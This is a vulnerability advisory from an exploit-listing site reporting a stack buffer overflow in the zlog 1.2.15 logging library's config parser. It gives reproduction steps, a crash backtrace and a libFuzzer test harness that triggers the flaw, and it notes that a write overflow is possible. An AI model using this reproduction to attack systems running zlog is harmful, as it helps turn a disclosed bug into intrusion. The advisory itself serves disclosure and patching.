zlog 1.2.15 Buffer Overflow

2021.11.09
Credit: LIWEI
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: zlog 1.2.15 - Buffer Overflow # Date: 10/23/2021 # Exploit Author: LIWEI # Vendor Homepage: https://github.com/HardySimpson/zlog # Software Link: https://github.com/HardySimpson/zlog # Version: v1.2.15 # Tested on: ubuntu 18.04.2 # 1.- compile the zlogv1.2.15 code to a library. # 2.- Use the "zlog_init" API to parse a file. You can do it as my testcase below. # 3.- crash. because it made a stack-buffer-overflow READ. # 4. -Also, you can get a stack-buffer-overflow WRITE when the pointer's address which overflow read is end with "0x20". # 5.- Here are the crash backtrace. #0 0x5588c3 in zlog_conf_build_with_file /src/zlog/src/conf.c:308:15 #1 0x557ad6 in zlog_conf_new /src/zlog/src/conf.c:176:7 #2 0x551183 in zlog_init_inner /src/zlog/src/zlog.c:91:18 #3 0x551008 in zlog_init /src/zlog/src/zlog.c:134:6 #4 0x550df1 in LLVMFuzzerTestOneInput /src/zlog_init_fuzzer.c:18:18 And also my testcase: #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include "zlog.h" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { char filename[256]; sprintf(filename, "/tmp/libfuzzer.%d", getpid()); FILE *fp = fopen(filename, "wb"); if (!fp) return 0; fwrite(data, size, 1, fp); fclose(fp); int rc = zlog_init(filename); if (rc == 0) { zlog_fini(); } unlink(filename); remove(filename); return 0; } Put my testcase in his project and change the compile line with CC="clang" CFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" CXX="clang++" CXXFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link -stdlib=libc++" Use ./configure under his project as shown in his README.txt. you will get a binary as testcase's name. run and you will reproduce it.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top